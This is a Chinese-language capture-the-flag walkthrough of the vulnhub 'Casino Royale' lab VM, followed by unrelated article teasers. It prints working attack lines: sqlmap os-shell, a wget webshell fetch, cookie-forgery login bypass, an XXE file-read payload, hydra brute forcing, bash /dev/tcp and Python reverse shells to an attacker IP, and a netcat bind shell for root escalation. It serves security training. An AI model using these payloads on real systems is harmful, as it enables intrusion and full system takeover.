Casino Royale靶場wp

0x00 下載安裝

https://download.vulnhub.com/casinoroyale/CasinoRoyale.ova

導入vmware啟動

0x01 主機信息收集

0x02目錄掃描

index.php 獲取到一個域名

修改本地hosts 添加一行

路徑:C:\Windows\System32\drivers\etc

192.168.2.20 casino-royale.local

點擊view,有點像sql查詢,抓包看看

很像注入點,sqlmap嗦一把,

一個延遲注入

獲取了三個用戶

--os-shell 寫不進去 可能是我重啟過靶機應該可以寫入的

只能用個sqlshell

select @@datadir: '/var/lib/mysql/' 文件寫不進去,換個方向

install 一個安裝PokerMax Pro Poker League Software頁面

查找到一個漏洞 PokerMax Poker League 0.13 - Insecure Cookie Handling - PHP webapps Exploit 添加cookie 獲得管理員登錄

8081端口,沒看出來啥,執行了是一個日志的東西

0x03繞過

1. 通過sql注入繞過

這里看前面大佬有搜到源碼,現在搜不到了

/pokeradmin/configure.php 登陸處存在注入,并且未做sql注入防護

sqlmap -u http://casino-royale.local/pokeradmin/ --level=5 --risk=3 --os-shell --batch --forms

通過wget下載一句話木馬,wget http://192.168.2.11/1.txt mv 1.txt 1.php 重命名

路徑為 http://casino-royale.local/pokeradmin/1.php 可以通過os-shell獲取路徑

獲取到數據庫賬戶密碼 valenka 11archives11

2.漏洞繞過

查找歷史漏洞

searchsploit PokerMax

searchsploit -m php/webapps/6766.txt

在瀏覽器f12控制臺執行js腳本

javascript:document.cookie = "ValidUserAdmin=admin";

重新訪問,成功繞過登錄

得到用戶名 密碼 admin raise12million

只有Valenka里面有東西

得到一個路徑

需要使用域名,把路徑加到后面 http://casino-royale.local/vip-client-portfolios/?uri=blog

有登錄 注冊 重置

密碼不知道,重置密碼,發送到了管理員賬戶,

找一下漏洞。

有一個csrf

Snowfox CMS 查找cms漏洞。有一個csrf

Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin) - PHP webapps Exploit

EHLO test5
MAIL FROM:obanno@bond.com
RCPT TO:valenka
DATA
Subject:obanno
http://192.168.2.11/index.html
obanno
kthxbai

.

發了n個郵件,一個也沒成功 跳過了 登錄獲取到路徑

view-source:http://casino-royale.local//ultra-access-view/main.php

查看源代碼 是一個xxe 可以讀取文件

寫入修改為post 用戶名為

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY file SYSTEM "file:///etc/passwd" >]> <creds> <customer>&file;</customer> <password>mypass</password> </creds>

ftpUserULTRA 提到密碼很簡單,來一波爆破

hydra -l ftpUserULTRA -P ignis-1K.txt ftp://192.168.2.21

得到密碼為 ftpUserULTRA bankbank

三個文件

perl文件 剛好是該目錄下 http://casino-royale.local/ultra-access-view/hello_world.pl 文件可以被執行,權限可讀可執行,,想辦法寫入反彈shell

直接找了個大馬,上傳,webshell/pl/pps-pl/pps-v4.0.pl at master · tennc/webshell · GitHub

執行反彈shell

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/192.168.2.11/11111 0>&1' ;

0x04 獲取le權限

查找可提權文件,

find / -type f -user root -perm -o=w 2>/dev/null | grep -v 'proc\|sys'

開啟監聽

反彈shell提權 沒啥用,沒得到權限

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/192.168.2.11/11111 0>&1' \;

查找可提權文件

find / -user root -perm -4000 -print 2>/dev/null

發現一個路徑/opt/casino-royale/mi6_detect_test 這幾個文件的權限很特別

這正好是8081端口運行的服務,點擊跳轉到http://casino-royale.local:8081/collect.php

查看源碼,該文件會執行目錄下的py文件,不可修改

點擊按鈕,會跳轉運行collect.php ,執行 casino-data-collection.py 我們直接寫入python反彈shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.11",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

啟動監聽,獲取shell,得到le權限,接下來要獲取root

0x05 獲取root權限

mi6_detect_test為root所有,會執行run.sh文件,我們通過echo命令開一個正向連接,寫入run.sh在運行mi6既可獲取到root權限 echo "nc -lvvp 1234 -t -e /bin/bash" >> run.sh

成功拿下

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/64538.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/64538.shtml
英文地址,請注明出處:http://en.pswp.cn/web/64538.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

智能家居體驗大變革 博聯 AI 方案讓智能不再繁瑣

1. 全球AI技術發展背景及智能家居市場趨勢 人工智能&#xff08;AI&#xff09;技術的飛速發展正在推動全球各行業的數字化轉型。國際電信聯盟與德勤聯合發布《人工智能向善影響》報告指出&#xff0c;全球94%的商界領袖認為&#xff0c;人工智能技術對于其企業在未來5年內的發…

鴻蒙開發(27)案例今日任務

案例為純前端實現&#xff0c;總結案例。 主頁面代碼 import { TaskStatisties } from ../view/TaskStatisties import { TaskItem } from ../view/TaskItem import CreateTaskModel, {TaskModel} from ../viewmodel/TaskModel import { router } from kit.ArkUI// xxx.ets En…

WPF編程excel表格操作

WPF編程excel表格操作 摘要NPOI安裝封裝代碼測試代碼 摘要 Excel操作幾種方式 使用開源庫NPOI(常用&#xff0c;操作豐富)使用Microsoft.Office.Interop.Excel COM組件(兼容性問題)使用OpenXml(效率高)使用OleDb(過時) NPOI安裝 封裝代碼 using System; using System.IO; u…

tcp_rcv_synsent_state_process函數

tcp_rcv_synsent_state_process 是 Linux Kernel 中用于處理 TCP 連接在 SYN-SENT 狀態下接收到報文的函數。這個函數在 TCP 三次握手階段起到了至關重要的作用,處理了在客戶端發送 SYN 請求之后收到服務器響應報文的各種情況。 以下是這個函數的解讀和剖析: int tcp_rcv_sy…

音視頻采集推流時間戳記錄方案

音視頻同步更多文章 深入理解音視頻pts&#xff0c;dts&#xff0c;time_base以及時間數學公式_視頻pts計算-CSDN博客 ffplay音視頻同步分析_ffplay 音視頻同步-CSDN博客 音視頻采集打時間戳設計 實時音視頻數據的采集和處理場景。具體來說: 采集階段: 在音視頻數據采集過…

Spark Runtime Filter

Runtime Filter 參考鏈接&#xff1a; https://docs.google.com/document/d/16IEuyLeQlubQkH8YuVuXWKo2-grVIoDJqQpHZrE7q04/edit?tabt.0https://www.modb.pro/db/557718https://issues.apache.org/jira/browse/SPARK-32268https://github.com/apache/spark/pull/35789https…

從0入門自主空中機器人-1【課程介紹】

關于本課程&#xff1a; 本次課程是一套面向對自主空中機器人感興趣的學生、愛好者、相關從業人員的免費課程&#xff0c;包含了從硬件組裝、機載電腦環境設置、代碼部署、實機實驗等全套詳細流程&#xff0c;帶你從0開始&#xff0c;組裝屬于自己的自主無人機&#xff0c;并讓…

專業140+總分410+南京大學851信號與系統考研經驗南大電子信息通信集成電路,真題,大綱。參考書。

本人本科中等211&#xff0c;離保送本校差一點&#xff0c;考研前糾結本校還是追求更高目標&#xff0c;和家人聊了自己的想法&#xff0c;感謝父母對我的支持&#xff0c;堅定報考南大的目標&#xff0c;最終專業851信號與系統140&#xff0c;總分410順利被南京大學錄取&#…

【C++】初識C++之C語言加入光榮的進化(上)

寫在前面 本篇筆記作為C的開篇筆記&#xff0c;主要是講解C關鍵字(C98)連帶一點點(C11)的知識。掌握的C新語法新特性&#xff0c;當然C是兼容C的&#xff0c;我們學習C的那套在C中也是受用。 ps:點我跳轉下集 文章目錄 寫在前面一、命名空間域1.1、命名空間域的定義與使用1.2…

CGAL windows 安裝教程

1.下載源代碼 CGAL官網下載https://github.com/CGAL/cgal/releases 2.下載boost庫 BOOST官網下載https://www.boost.org/ 3.下載 GMP and MPFR 4.配置VS2022 頭文件&#xff1a; 庫路徑 做完以上步驟&#xff0c;可以使用CGAL了&#xff01;

從0入門自主空中機器人-2-2【無人機硬件選型-PX4篇】

1. 常用資料以及官方網站 無人機飛控PX4用戶使用手冊&#xff08;無人機基本設置、地面站使用教程、軟硬件搭建等&#xff09;&#xff1a;https://docs.px4.io/main/en/ PX4固件開源地址&#xff1a;https://github.com/PX4/PX4-Autopilot 飛控硬件、數傳模塊、GPS、分電板等…

每天40分玩轉Django:Django緩存

一、Django緩存概述 在高并發的Web應用中,緩存是提高性能的重要手段。通過緩存頻繁訪問的數據,可以顯著減少數據庫查詢和渲染模板的時間,從而加快響應速度,提升用戶體驗。Django提供了多層級的緩存方案,可以靈活地滿足不同場景下的緩存需求。 Django支持的緩存方式包括: 視圖…

GraphRAG 框架哪家強?選擇最適合你智能問答系統的框架

GraphRAG 框架哪家強&#xff1f;選擇最適合你智能問答系統的框架 點擊進入&#xff1a;GraphRAG系列文章-Nano-GraphRAG&#xff1a;打造輕量級醫療診斷助手 點擊進入&#xff1a;GraphRAG系列文章-突破傳統知識管理瓶頸&#xff1a;LlamaIndex GraphRAG 讓企業知識問答更智能…

Mac電腦python多版本環境安裝與切換

我當前是python3.9.6環境&#xff0c;需要使用3.9.8環境&#xff0c;通過brew安裝3.9.8版本&#xff0c;然后通過pyenv切換環境 步驟 1: 安裝 pyenv brew install pyenv brew install pyenv-virtualenv 步驟 2: 安裝 Python 3.9.8&#xff08;使用 pyenv 安裝指定版本的 Pyth…

Redis--持久化策略(AOF與RDB)

持久化策略&#xff08;AOF與RDB&#xff09; 持久化Redis如何實現數據不丟失&#xff1f;RDB 快照是如何實現的呢&#xff1f;執行時機RDB原理執行快照時&#xff0c;數據能被修改嗎&#xff1f; AOF持久化是怎么實現的&#xff1f;AOF原理三種寫回策略AOF重寫機制 RDB和AOF合…

C高級:思維導圖Day2

目錄 總覽1 總覽2 總覽1 壓縮與解壓縮 打包與解包 軟連接與硬鏈接 ubuntu下關機與重啟指令 總覽2 結束

pwntools用法

pwntools 是一個Python庫&#xff0c; 用于編寫二進制漏洞利用&#xff08;exploitation&#xff09;腳本 功能&#xff1a; 遠程連接和本地連接&#xff1a; 支持通過TCP/UDP連接遠程服務或與本地進程進行交互。Shellcode和ROP鏈構造&#xff1a; 提供了便捷的工具來生成和利…

【每日學點鴻蒙知識】placement設置top、組件攜帶自定義參數、主動隱藏輸入框、Web設置字體、對話框設置全屏寬

1、popup組件placement設置top沒有生效&#xff1f; 可以用offset屬性將popup往下邊偏移一下 來規避 2、組件攜帶自定義參數的接口是哪個&#xff1f; 參考鏈接&#xff1a;https://developer.huawei.com/consumer/cn/doc/harmonyos-references-V5/ts-universal-attributes-…

PyTorch快速入門教程【小土堆】之優化器

視頻地址優化器&#xff08;一&#xff09;_嗶哩嗶哩_bilibili import torch import torchvision from torch import nn from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential from torch.utils.data import DataLoaderdataset torchvision.datasets.CIFAR1…

數據庫篇:mysql內置函數

前言 sql 是程序開發員繞不開的一項技能&#xff0c;而mysql是當前最流行的數據庫&#xff0c;熟知其內置的一些函數&#xff0c;可以使我們平時的開發工作更加順暢和方便 時間日期函數 字符串函數 數學計算相關函數 條件判斷函數 加密和壓縮函數 聚合函數 格式或類型轉…